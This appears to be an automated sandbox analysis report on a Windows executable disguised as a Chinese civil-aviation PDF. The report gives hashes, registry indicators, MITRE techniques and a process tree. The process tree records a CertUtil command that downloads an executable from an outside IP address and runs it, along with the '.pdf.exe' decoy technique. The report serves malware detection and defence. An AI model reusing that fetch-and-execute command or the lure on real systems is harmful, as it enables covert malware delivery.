82b8d175292a3441624af910e61ef4c6abadbea2efe824e7883b145acdf18974

Analysis

max time kernel
146s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
25-04-2023 15:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

infected2023042501/Downloads/2021-2022年度民航青年文明号拟命名集体名单.pdf.exe
Size

2.8MB
MD5

6c372539a592a1569029e61d7f5cbaa3
SHA1

bd349cc828ea45a0264db64fd856110ae0332620
SHA256

b24bc9659b4445a0581b4e14d62501a22f731f2525be01c65ca8c86b9d8310f3
SHA512

c55659a57c5f8b8476c30cd2c27a505cca9d090b7e1d5adc122ad52cb04f9f4b839a34c6bc3594cbf1bce56d7d47e75496f70a768bfedc378edc2689bad69fe8
SSDEEP

49152:cvYTjUP3QRrb/TJvO90d7HjmAFd4A64nsfJBbbFegmhVYgkJ7D/lUb1UeqU2hqYF:6Q6Z

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
3528	payloadgo.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/0x0008000000022f88-136.dat	upx
behavioral4/files/0x0008000000022f88-137.dat	upx
behavioral4/memory/3528-139-0x00000000004E0000-0x000000000067D000-memory.dmp	upx
behavioral4/memory/3528-143-0x00000000004E0000-0x000000000067D000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
3996	AcroRd32.exe
3996	AcroRd32.exe
3996	AcroRd32.exe
3996	AcroRd32.exe
3996	AcroRd32.exe
3996	AcroRd32.exe
3996	AcroRd32.exe
3996	AcroRd32.exe
3996	AcroRd32.exe
3996	AcroRd32.exe
3996	AcroRd32.exe
3996	AcroRd32.exe
3996	AcroRd32.exe
3996	AcroRd32.exe
3996	AcroRd32.exe
3996	AcroRd32.exe
3996	AcroRd32.exe
3996	AcroRd32.exe
3996	AcroRd32.exe
3996	AcroRd32.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
2780	2021-2022年度民航青年文明号拟命名集体名单.pdf.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3996	AcroRd32.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
3996	AcroRd32.exe
3996	AcroRd32.exe
3996	AcroRd32.exe
3996	AcroRd32.exe
3996	AcroRd32.exe
3996	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2780 wrote to memory of 4460	2780	2021-2022年度民航青年文明号拟命名集体名单.pdf.exe	83
PID 2780 wrote to memory of 4460	2780	2021-2022年度民航青年文明号拟命名集体名单.pdf.exe	83
PID 2780 wrote to memory of 3528	2780	2021-2022年度民航青年文明号拟命名集体名单.pdf.exe	84
PID 2780 wrote to memory of 3528	2780	2021-2022年度民航青年文明号拟命名集体名单.pdf.exe	84
PID 3528 wrote to memory of 3268	3528	payloadgo.exe	85
PID 3528 wrote to memory of 3268	3528	payloadgo.exe	85
PID 3268 wrote to memory of 1816	3268	cmd.exe	87
PID 3268 wrote to memory of 1816	3268	cmd.exe	87
PID 4460 wrote to memory of 3996	4460	cmd.exe	88
PID 4460 wrote to memory of 3996	4460	cmd.exe	88
PID 4460 wrote to memory of 3996	4460	cmd.exe	88
PID 3528 wrote to memory of 4704	3528	payloadgo.exe	90
PID 3528 wrote to memory of 4704	3528	payloadgo.exe	90
PID 3996 wrote to memory of 552	3996	AcroRd32.exe	95
PID 3996 wrote to memory of 552	3996	AcroRd32.exe	95
PID 3996 wrote to memory of 552	3996	AcroRd32.exe	95
PID 3996 wrote to memory of 4744	3996	AcroRd32.exe	96
PID 3996 wrote to memory of 4744	3996	AcroRd32.exe	96
PID 3996 wrote to memory of 4744	3996	AcroRd32.exe	96
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3360	552	RdrCEF.exe	98
PID 552 wrote to memory of 3948	552	RdrCEF.exe	99
PID 552 wrote to memory of 3948	552	RdrCEF.exe	99
PID 552 wrote to memory of 3948	552	RdrCEF.exe	99
PID 552 wrote to memory of 3948	552	RdrCEF.exe	99

C:\Users\Admin\AppData\Local\Temp\infected2023042501\Downloads\2021-2022年度民航青年文明号拟命名集体名单.pdf.exe
"C:\Users\Admin\AppData\Local\Temp\infected2023042501\Downloads\2021-2022年度民航青年文明号拟命名集体名单.pdf.exe"
1⤵
- Suspicious behavior: RenamesItself
- Suspicious use of WriteProcessMemory
PID:2780
- C:\Windows\system32\cmd.exe
  cmd " /c " C:\Users\Admin\AppData\Local\Temp\infected2023042501\Downloads\2021-2022年度民航青年文明号拟命名集体名单.pdf
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4460
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\infected2023042501\Downloads\2021-2022年度民航青年文明号拟命名集体名单.pdf"
    3⤵
    - Checks processor information in registry
    - Modifies Internet Explorer settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3996
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      4⤵
      Suspicious use of WriteProcessMemory
      PID:552
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=06A049E15CFF08B6226ABB9F48543624 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:3360
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BD05404C41EF6252A31A55B948FE0314 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=BD05404C41EF6252A31A55B948FE0314 --renderer-client-id=2 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job /prefetch:1
        5⤵
        
        PID:3948
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7B5B024BBA995CAFC55BE5B64A4B5E95 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7B5B024BBA995CAFC55BE5B64A4B5E95 --renderer-client-id=4 --mojo-platform-channel-handle=2160 --allow-no-sandbox-job /prefetch:1
        5⤵
        
        PID:2228
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=14C6180411728FBB02BACA3286A7C9A3 --mojo-platform-channel-handle=2196 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:2372
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=13B89BF8C44C2AF89269F0A0C2030FC5 --mojo-platform-channel-handle=2584 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:1584
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=245A4F9364E9D7898D33A55CF7771739 --mojo-platform-channel-handle=2568 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:2664
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      4⤵
      PID:4744
- C:\Users\Public\payloadgo.exe
  C:\Users\Public\payloadgo.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /C CertUtil -urlcache -split -f http://49.4.86.39:30010/getsysteminfo.exe C:\Windows\Temp\UpgradeHelper.exe & C:\Windows\Temp\UpgradeHelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3268
  - - C:\Windows\system32\certutil.exe
      CertUtil -urlcache -split -f http://49.4.86.39:30010/getsysteminfo.exe C:\Windows\Temp\UpgradeHelper.exe
      4⤵
      PID:1816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /C del /F /S C:\Windows\Temp\UpgradeHelper.exe
    3⤵
    PID:4704

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3736

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
ca527cedabf92a38c57b1197b9c28deb

SHA1
d6435dd74bdf146a2a3c4c7636cb565c1761e367

SHA256
b750f709f6ab6d5eddc1c2f1a9a768bbf1b65d7b0a20d167f5ec4c0c3e8b7705

SHA512
8bf80fbad7e3b54990e15e086f5808f9d8bcc76346b54841e138783a51caef6c409db0d7446f0ad241049f7135152b29f5336903c71c0f9f2d225c0fcf5b780d

Download Submit
C:\Users\Admin\AppData\Local\Temp\infected2023042501\Downloads\2021-2022年度民航青年文明号拟命名集体名单.pdf

Filesize
124KB

MD5
9126c87d78a10a7a10c244a33c48f70f

SHA1
0e8ccc425038bc553619935e6d2fc83048dcb549

SHA256
1965fabaad3bf5725256b6ce34ebe572b90a0b4f1f976015360373871617e68a

SHA512
9dae9921577673b9341a7897e30cad8bcf2fe1c141d1f443aaca381a520b44571d01f5ed31ebb26bfe2d0c35b9199220d33bac383a4192fcfb12543854c96039

Download Submit
C:\Users\Public\payloadgo.exe

Filesize
491KB

MD5
9e5f182d0296eee741d4606f13bebaec

SHA1
b0aeed0e50d364f0bff7d37ca0e4af5e365a5d23

SHA256
e0de81dd98d1f02a45c8024cc21d84fac93453013deae7db2f812e71209e2a58

SHA512
557c8ee236151561bf27f3e32d013e5a122e66ffe7e73a4f0aa957e50ea7baa3b56ff2b39292a4adb0d14e572e5a160e6e1b04be240e30ee7f87337fd2f28bcc

Download Submit
C:\Users\Public\payloadgo.exe

Filesize
491KB

MD5
9e5f182d0296eee741d4606f13bebaec

SHA1
b0aeed0e50d364f0bff7d37ca0e4af5e365a5d23

SHA256
e0de81dd98d1f02a45c8024cc21d84fac93453013deae7db2f812e71209e2a58

SHA512
557c8ee236151561bf27f3e32d013e5a122e66ffe7e73a4f0aa957e50ea7baa3b56ff2b39292a4adb0d14e572e5a160e6e1b04be240e30ee7f87337fd2f28bcc

Download Submit
memory/3528-139-0x00000000004E0000-0x000000000067D000-memory.dmp

Filesize
1.6MB

Download
memory/3528-143-0x00000000004E0000-0x000000000067D000-memory.dmp

Filesize
1.6MB

Download